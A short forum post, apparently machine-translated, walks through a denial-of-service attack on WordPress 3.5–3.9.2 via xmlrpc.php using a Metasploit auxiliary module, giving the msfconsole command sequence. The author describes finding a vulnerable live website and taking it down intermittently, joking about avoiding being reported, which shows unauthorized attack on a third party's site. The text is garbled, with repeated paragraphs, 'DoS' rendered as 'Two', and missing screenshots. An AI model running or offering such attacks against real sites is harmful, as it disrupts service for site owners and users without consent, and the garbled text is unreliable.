DoS in Wordpress with xmlrpc.php
That there are guys I bring this small
xmlrpc.php for what it serves?
Xmlrpc.php is in charge of allowing us to post remotely through Microsoft Word, Textmate, Thunderbird, smartphones, among other clients. All this through the XML-RPC protocol.
It will also be responsible for receiving the pingbacks (links of other blogs to some of our articles) and send the trackbacks (links from our blog to articles from another blog).
Well the vulnerability of xmlrpc I long ago
this file is used to make a powerful attack Two, where friend metasploit already made his work: D
I look for a website with wp vulnerable versions: 3.5 - 3.9.2
xmlrpc.php for what it serves?
Xmlrpc.php is in charge of allowing us to post remotely through Microsoft Word, Textmate, Thunderbird, smartphones, among other clients. All this through the XML-RPC protocol.
It will also be responsible for receiving the pingbacks (links of other blogs to some of our articles) and send the trackbacks (links from our blog to articles from another blog).
Well the vulnerability of xmlrpc I long ago
this file is used to make a powerful attack Two, where friend metasploit already made his work: D
Code:
msf > use auxiliary/dos/http/wordpress_xmlrpc_dos
msf auxiliary(wordpress_xmlrpc_dos) > show actions
...actions...
msf auxiliary(wordpress_xmlrpc_dos) > set ACTION
msf auxiliary(wordpress_xmlrpc_dos) > show options
...show and set options...
msf auxiliary(wordpress_xmlrpc_dos) > run
I look for a website with wp vulnerable versions: 3.5 - 3.9.2
I do not show the website to demonstrate something ethical (do not lie to denounce jajaj)
After completing the rhost and targeturi we give to run
After completing the rhost and targeturi we give to run
and with this we will be starting the two, the website falls at times, but let us see a
speed test of load before and after:
speed test of load before and after:
Before:
With the two active:
Regards!
With the two active:
Regards!